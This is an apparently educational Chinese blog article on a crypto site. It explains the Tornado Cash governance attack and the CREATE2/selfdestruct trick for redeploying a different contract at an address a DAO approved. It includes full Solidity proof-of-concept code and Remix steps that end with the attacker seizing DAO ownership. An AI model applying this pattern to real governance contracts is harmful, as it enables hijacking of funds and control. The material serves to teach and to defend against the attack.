区块链NFT投资,BTC/USDT/CGPAY,虚拟加密货币交易行情分析平台
解析Tornado治理攻击:如何同一个地址上部署不同的合约
大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado.Cash提案攻击原理分析[1]。
这里攻击的关键是在同一个地址上部署了不同的合约, 这是如何实现的呢?
背景知识
EVM 中有两个操作码用来创建合约:CREATE
与 CREATE2
。
CREATE
操作码
当使用 new Token()
使用的是 CREATE
操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(senderAddress, nonce))
创建的合约地址是通过创建者地址 + 创建者Nonce(创建合约的数量)来确定的, 由于 Nonce 总是逐步递增的, 当 Nonce 增加时,创建的合约地址总是是不同的。
CREATE2
操作码
当添加一个salt时 new Token{salt: bytes32()}()
,则使用的是 CREATE2
操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))
创建的合约地址是 创建者地址 + 自定义的盐 + 要部署的智能合约的字节码, 因此 只有相同字节码 和 使用相同的盐值,才可以部署到同一个合约地址上。
那么如何才能在同一地址如何部署不用的合约?
攻击手段
攻击者结合使用 Create2
和 Create
来创建合约, 如图:
代码参考自:https://solidity-by-example.org/hacks/deploy-different-contracts-same-address/
先用 Create2
部署一个合约 Deployer
, 在 Deployer
使用 Create 创建目标合约 Proposal
(用于提案使用)。 Deployer
和 Proposal
合约中均有自毁实现(selfdestruct
)。
在提案通过后,攻击者把 Deployer
和 Proposal
合约销毁,然后重新用相同的slat创建 Deployer
, Deployer
字节码不变,slat 也相同,因此会得到一个和之前相同的 Deployer
合约地址, 但此时 Deployer
合约的状态被清空了, nonce 从 0 开始,因此可以使用该 nonce 创建另一个合约Attack
。
攻击代码示例
此代码来自:https://solidity-by-example.org/hacks/deploy-different-contracts-same-address/
// SPDX-License-Identifier: MITpragma solidity ^0.8.17;
contract DAO { struct Proposal {
address target; bool approved;
bool executed; }
address public owner = msg.sender; Proposal[] public proposals;
function approve(address target) external { require(msg.sender == owner, "not authorized");
proposals.push(Proposal({target: target, approved: true, executed: false})); }
function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId];
require(proposal.approved, "not approved"); require(!proposal.executed, "executed");
proposal.executed = true; (bool ok, ) = proposal.target.delegatecall(
abi.encodeWithSignature("executeProposal()") );
require(ok, "delegatecall failed"); }
}contract Proposal {
event Log(string message); function executeProposal() external {
emit Log("Excuted code approved by DAO"); }
function emergencyStop() external { selfdestruct(payable(address(0)));
}}
contract Attack { event Log(string message);
address public owner; function executeProposal() external {
emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker
owner = msg.sender; }
}contract DeployerDeployer {
event Log(address addr); function deploy() external {
bytes32 salt = keccak256(abi.encode(uint(123))); address addr = address(new Deployer{salt: salt}());
emit Log(addr); }
}contract Deployer {
event Log(address addr); function deployProposal() external {
address addr = address(new Proposal()); emit Log(addr);
} function deployAttack() external {
address addr = address(new Attack()); emit Log(addr);
} function kill() external {
selfdestruct(payable(address(0))); }
}
大家可以使用该代码自己在 Remix 中演练一下。
首先部署
DeployerDeployer
, 调用DeployerDeployer.deploy()
部署Deployer
, 然后调用Deployer.deployProposal()
部署Proposal
。拿到
Proposal
提案合约地址后, 向 DAO 发起提案。分别调用
Deployer.kill
和Proposal.emergencyStop
销毁掉Deployer
和Proposal
再次调用
DeployerDeployer.deploy()
部署Deployer
, 调用Deployer.deployAttack()
部署Attack
,Attack
将和之前的Proposal
一致。执行
DAO.execute
时,攻击完成 获取到了 DAO 的 Owner 权限。
相关文章
- XYO Network 价格预测2025、2030市场预测分析
- 以太坊挖矿与DeFi挖矿的差异及其影响
- DeFi挖矿风险六大关键要素及高收益背后的收益计算指南
- 以太坊挖矿的操作指南,從区块链中获利新手必备知...
- Web3无缝生态系统未来数位互动的转型与挑战
- 数位钱包革命:2025年6大精选推荐改变您的财务未来
- ZKsync空投风波何时以及如何领取代币?
- 高风险高回报,2025年值得关注的平台币
- 探讨Vault机枪池收益聚合工具的利弊与风险,投资者...
- 数字银行Revolut创新海外财务管理及改变你生活的赚...
- 2024年Web3的挑战与新兴解决方案
- 数字货币钱包存款周抢18,888奖金,钱包存款活动
- 闪电网络钱包的未来探秘
- 加密货币转换为当地法币过程
- Qubic Web3 钱包崛起,整合NFT交易服务
- 老哥币领福利使用指南,获取途径自由、分享价值互...